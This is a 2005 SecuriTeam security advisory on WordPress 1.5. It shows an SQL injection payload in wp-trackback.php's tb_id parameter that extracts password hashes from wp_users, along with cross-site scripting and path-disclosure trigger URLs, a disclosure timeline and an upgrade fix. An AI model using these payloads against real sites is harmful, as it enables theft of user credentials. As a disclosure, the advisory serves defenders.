The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

• • promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

---

WordPress Multiple Vulnerability (wp-trackback.php)

SUMMARY

<http://wordpress.org/&gt; WordPress is "a state-of-the-art semantic
personal publishing platform with a focus on aesthetics, web standards,
and usability".

Multiple security vulnerabilities have been found in WordPress, the
vulnerabilities range from a password revealing SQL injection, through
cross site scripting vulnerabilities to path disclosure issues.

DETAILS

Vulnerable Systems:

• WordPress version 1.5 and prior

Immune Systems:

• WordPress version 1.5.1 or newer

SQL Injection:
The most critical vulnerability in the 1.5 release of wordpress is an
SQL-Injection in `wp-trackback.php'. It's not easily exploitable because
you do not get a result when you inject a valid query but it's possible to
brute force values in the tables - for example the password hashes.

Here some details:
The parameter `tb_id' in `wp-trackback.php' is not validated correctly and
there are no quotes in the SQL-query so an attacker is able to insert SQL
commands.

$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts WHERE
ID = $tb_id");

Example:
> $tb_id = 1 union select user_pass,0 from wp_users
> $url = bla
> $title = bla

</wp-trackback.php?tb_id=1 union select 0,user_pass from
wp_users&url=bla&title=bla>

By injecting this query we get following database error:
> WordPress database error:
> [The used SELECT statements have a different number of columns]
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,
> user_pass from wp_users

When we insert "1 union select user_pass from wp_users" as value for
`tb_id' we get no error message because the query was well-formed -
logical. Through the possibility to insert any SQL-command it's possible
to 'reconstruct' values of the tables.

XSS:
The following two URLs can be used to trigger the cross site scripting
vulnerability on the remote host:
http://vulnerable/wp-admin/edit.php?s=[XSS]&submit=Search
http://vulnerable/wp-admin/post.php?action=confirmdeletecomment
&comment=1&p=[XSS]

Path Disclosure:
The following three URLs can be used to trigger the path disclosure
vulnerability on the remote host:
http://vulnerable/wordpress-1.5-strayhorn/wp-content/themes/*
http://vulnerable/wordpress-1.5-strayhorn/wp-includes/*
http://vulnerable/wordpress-1.5-strayhorn/wp-admin/*

> Fatal error: Call to undefined function add_filter() in
> […]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/
> wp-content/themes/classic/comments-popup.php on line 3

Solution:
Upgrade to WordPress version 1.5.1 or newer.

Disclosure Timeline:
17 Apr 05 - Security flaws discovered
19 Apr 05 - Vendor contacted
10 May 05 - Vendor released bugfixed version
17 May 05 - Public release

ADDITIONAL INFORMATION

The information has been provided by <mailto:[email protected]> Thomas
Waldegger.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.